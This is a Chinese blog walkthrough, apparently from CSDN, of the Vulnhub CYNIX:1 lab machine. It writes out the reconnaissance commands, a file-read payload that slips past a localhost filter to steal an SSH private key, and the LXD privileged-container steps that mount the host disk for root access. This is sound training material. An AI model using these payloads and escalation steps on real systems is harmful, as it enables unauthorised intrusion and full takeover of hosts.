Vulnhub靶机:CYNIX_ 1

最新推荐文章于 2023-08-17 14:11:30 发布
最新推荐文章于 2023-08-17 14:11:30 发布
阅读量1.7k 收藏 5
点赞数 2
分类专栏: 靶机 文章标签: Vulnhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44288604/article/details/122513186
版权

目录

介绍

难度:中等
靶机发布日期:2019年11月27日
Flag两个:User flag: user.txt;Root flag: root.txt
靶机地址:https://www.vulnhub.com/entry/cynix-1,394/

学习:LXD提权

信息收集

主机发现

netdiscover主机发现
额,,无法通过主机名区分开哪个才是靶机。

sudo netdiscover -i eth1 -r 192.168.124.0/24

在这里插入图片描述

nmap主机发现
根据对MAC地址的解析,确认靶机是192.168.124.24

nmap -sn 192.168.124.0/24

在这里插入图片描述

主机信息探测

信息探测:nmap -A -p- 192.168.124.24
在这里插入图片描述

网站探测

访问80端口,没啥信息
在这里插入图片描述

目录扫描

gobuster dir -u http://192.168.124.24 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

在这里插入图片描述

只发现了/lavalamp子目录。
在这里插入图片描述

点了点,好像也就“CONTACT”能输入点东西,暂时还不知道怎么用
在这里插入图片描述

再试着扫描一下子目录/lavalamp下有哪些东东,扫出来一些目录,试着访问一下结果403禁止访问。
在这里插入图片描述

网站测试

这个时候,只能回到/lavalamp试试,随便输入点东西,BurpSuite抓包重放一下。响应包出现“Specify a number”,提示我们输入一个数字。
在这里插入图片描述

渲染一下页面呢?
在这里插入图片描述

停止抓包,看下页面响应内容。首先并没有发现BP响应包的页面,其次“CONTACT”页面上出现一个红色的框框,无法输入内容。审计页面后发现了一个地址,它的title写着“Can You Bypass Me?”,可以试着访问一下。
在这里插入图片描述

在这里插入图片描述

其实,如果在BP中选择复制URL地址,也会得到这个页面
在这里插入图片描述

继续尝试审计页面,看到submit,这里好像是一个提交框,只是我看不到它。这个时候只需要鼠标双击网页人物Neo的额头的框框即可。
在这里插入图片描述

双击之后,页面出现一个黑色的框框
在这里插入图片描述

在黑色框框中随便输入点东西,然后双击Neo的额头,抓个包。看到参数的名字file猜测可能跟文件读取有点关系,试一试吧
在这里插入图片描述

页面提示,我应该试试访问本地文件。那就试试任意文件读取呢?
在这里插入图片描述

直接访问当前地址呢?提示我不能这么做
在这里插入图片描述

换用/etc/passwd,转到源码模式,发现提示我们选择一个数字,我选择个锤子呦,不出效果,应该还是姿势不对。
在这里插入图片描述

在这里插入图片描述

简单分析一下,我们被告知要访问本地文件,但是直接访问都失败了,因该是要尝试做绕过,试试IP地址转换,在linux中,以下几种方式是等价的(可自行测试):

  • ping 127.0.0.1
  • ping 127.0.1
  • ping 127.1
  • ping 0x7f.1
  • ping 2130706433

通过响应包,大致判断可以登录的用户只有ford。
在这里插入图片描述

读取SSH私钥

由于靶机只开放了80端口和6688(SSH)两个端口,此时大胆猜测,下一步既然要SSH连接ford用户,那么ford用户的家目录里面有没有SSH私钥呢?

file=2130706433/../../home/ford/.ssh/id_rsa&read=Download+the+number

在这里插入图片描述

把获取到的SSH私钥保存到kali上,连接靶机

SSH连接靶机

第一个Flag

获取到第一个Flag:02d6267ed96e6b615b031dafe9607151

vim id_rsa
chmod 600 id_rsa
ssh -i id_rsa ford@192.168.124.24 -p 6688

在这里插入图片描述

提权

网上下载个LinEnum,测试一下,发现 lxd 有可能存在利用
在这里插入图片描述

  1. 查看镜像列表:lxc image list,是空的

  2. 创建特权容器:lxc init ubuntu:18.04 asuka -c security.privileged=true

在这里插入图片描述

由于实际的情况中往往是创建失败的,所以再额外罗嗦一下创建失败咋整。咋整就是在kali上生成镜像,然后复制到靶机上面。参见:https://github.com/saghul/lxd-alpine-builder

lxd提权

  1. 在kali上生成镜像
git clone https://github.com/saghul/lxd-alpine-builder.git
sudo ./build-alpine

在这里插入图片描述

生成的新镜像
在这里插入图片描述

  1. kali开启http服务,靶机下载镜像
python3 -m http.server 80
  1. 靶机下载镜像:wget http://192.168.124.22/alpine-v3.15-x86_64-20220115_0347.tar.gz

在这里插入图片描述

  1. 导入文件,并对其重命名
lxc image import ./alpine-v3.15-x86_64-20220115_0347.tar.gz --alias fromkali

在这里插入图片描述

  1. 创建容器:lxc init fromkali fromkali -c security.privileged=true
  2. 挂载容器, 在/mnt/root 下挂载整个磁盘:

lxc config device add fromkali fromkali disk source=/ path=/mnt/root recursive=true

  1. 启动容器:lxc start fromkali
  2. 指定与主机交互的终端:lxc exec fromkali /bin/sh

观察IP地址知道,我现在是在靶机的容器中。
在这里插入图片描述

  1. 查看宿主机的文件目录:ls -al /mnt/root/root

之后就可以获取flag2了
在这里插入图片描述

第二个Flag

查看文件:cat /mnt/root/root/root.txt
得到Flag:b0f971eddce7bd007e9f50ca02f5fe11
在这里插入图片描述

参考

127.257 and other fun legacy IP addresses
『VulnHub系列』CyNix: 1-Walkthrough

lainwith
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
20210628 cynix靶机实战
qq_45290991的博客
06-28 203
一、信息探测 靶机ip 192.168.56.101 Apache 目录扫描dirsearch: 端口nmap: 二、代码审计 逐个访问,发现居然改了透明度,但是访问/lavalamp/canyoubypassme.php时发现跟/lavalamp/head.php居然长得一模一样~这就不对劲了呀。随后查看源代码,发现有个透明度被设置为0(opacity: 0.0)的table标签,随即将其修改为opacity: 1.0 三、突破登录 .
Vulnhub靶机实战-CYNIX 1
黑白的博客
01-18 537
声明 好好学习,天天向上 搭建 官方建议virtual打开,我这里都调成桥接 渗透 存活扫描,发现目标 arp-scan -l 端口扫描 nmap -T4 -A 192.168.31.121 -p 1-65535 -oN nmap.A 开启端口 发现开启80,6688 访问80 http://192.168.31.121 目录扫描 gobuster dir -u http://192.168.31.121 -w /usr/share/wordlists/dirbuster/directory-lis
VulnHub系列』CyNix: 1-Walkthrough
ins1ght的博客
01-12 849
这是我完成的VulnHub上的第31个靶机靶机发布日期:2019年11月27日。难度:中等。标签:SSH密钥登录、文件读取、ByPass、lxd提权。
靶场CyNix
qq_56414082的博客
08-17 93
提交后发现跳转到了http://192.168.16.159/lavalamp/canyoubypassme.php。下载地址:https://github.com/saghul/lxd-alpine-builder.git。知道普通用户名:ford❌1000:1000:ford,:/home/ford:/bin/bash。在 http://192.168.16.159/lavalamp/ 网站下面有提交框。接着看源代码,在源代码中发现有input提交框,明显是被隐藏显示了。/ect/passwd,拦截。
2020最新渗透测试靶机和工具及教程
05-30
搜集的渗透测试的靶场,有Bwapp综合靶场练习 webug综合靶场练习 DVWA综合靶场练习 pikachu靶场练习 uploads文件练习 SQlilabs注入练习 ZVulDirll综合靶场,全部封装在虚拟机中,渗透工具封装在另一虚拟机中。
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
vulnhub靶机实战-My-cmsms靶机
最新发布
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
渗透测试新手练习及高手深入挖掘专用Linux及Windows靶机(官方原版镜像)
05-08
本人学习时使用的的这两个系统,常见的高风险漏洞较多,容易利用,适合新手练习。 metasploitable-linux为常用的Linux靶机,系统包含了很多高风险漏洞、弱口令及容易利用的端口、服务,是渗透测试初学者练习技术的不二之选。 Windows_xp_pro_with_sp2就更不用说了,都被人挖烂了,sp2版本相比sp3更简单一些,适合新手练习。
VulnHub系列』DC: 9-Walkthrough
ins1ght的博客
01-14 1328
这是我完成的VulnHub上的第32个靶机靶机发布日期:2019年12月29日,难度:中等。标签:SQLi、“撞库”、LFI。
天书夜读-2、3——笔记
蹒跚路行
10-23 345
这两天吧2、3两章看了,没什么好说的,基本的反汇编而已。之前曾玩过几个月的反汇编,(没坚持多久)。不过看着点还是没问题 问题是以后需要大量的锻炼,道理是没有汗水没有进步 本来准备把赛门铁克的那篇文字给翻译,感觉自己还没多少理解,先学习吧,以后肯定是在这篇里补充 对了,感谢《竹林蹊径》放出来试读,按照里面的附录B,我下载了VirtualKD,设置好了VirtualBox和VM。
MS08067/MS10061漏洞靶机环境搭建总结
SQL_injection的专栏
08-15 1万+
MS08067/MS10061漏洞靶机环境搭建总结
OWASP_VM_1.2靶机的下载与安装
热门推荐
冠霖L的博客
07-04 3万+
OWASP(Broken Web Applications Project),是一组易受攻击的Open Web应用程序安全项目,分布在VMware格式的虚拟机上,包含了当前几乎全部类型的漏洞,例如:SQL注入、XSS攻击等等。它是由一家非营利性组织——OWASP 基金会提供持续性支持,可免费下载与使用。 OWASP官网:https://www.owasp.org OWASP中国官网:http:...
VulnHub系列』five86_1-Walkthrough
ins1ght的博客
01-23 912
这是我完成的VulnHub上的第36个靶机靶机发布日期:2020年1月8日,难度:初级+。
靶机OWASPBWA下载及安装
weixin_45798017的博客
03-31 5899
下载路径:https://sourceforge.net/projects/owaspbwa/files/
Vulnhub靶机渗透测试】之DC-5(screen-4.5.0漏洞脚本提权)
Pluto.的博客
12-29 1594
文章目录Vulnhub靶机渗透测试之DC-51. 信息收集2. 漏洞利用3. 提权 Vulnhub靶机渗透测试之DC-5 环境搭建 靶机镜像下载地址:https://www.vulnhub.com/entry/dc-5,314/; 需要将靶机和kali攻击机放在同一个局域网里; kali的IP地址:192.168.40.142。 1. 信息收集 2. 漏洞利用 3. 提权 ...
从sourceforge的镜像站下载软件(OWASP靶机
banerye的博客
07-04 4163
sourceforge是开源软件的开发者进行开发管理的集中式场所。 但是它经常崩,有一些软件就下不了。 可以尝试到这个镜像网站去下载: ????UK mirror server 下载方式:以owaspbwa(owasp渗透靶机)为例 该网站是按照字典序分目录的。 依次选择o/ow/owaspbwa,接着就可以看到能够下载的版本了。 下载时再用上一篇说的方法加速下载,速度比官网不知道快到哪里去了。???? 上一篇文章链接: 用种子下载程序加速下载 ...
vulnhub靶机系列:
09-09
1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值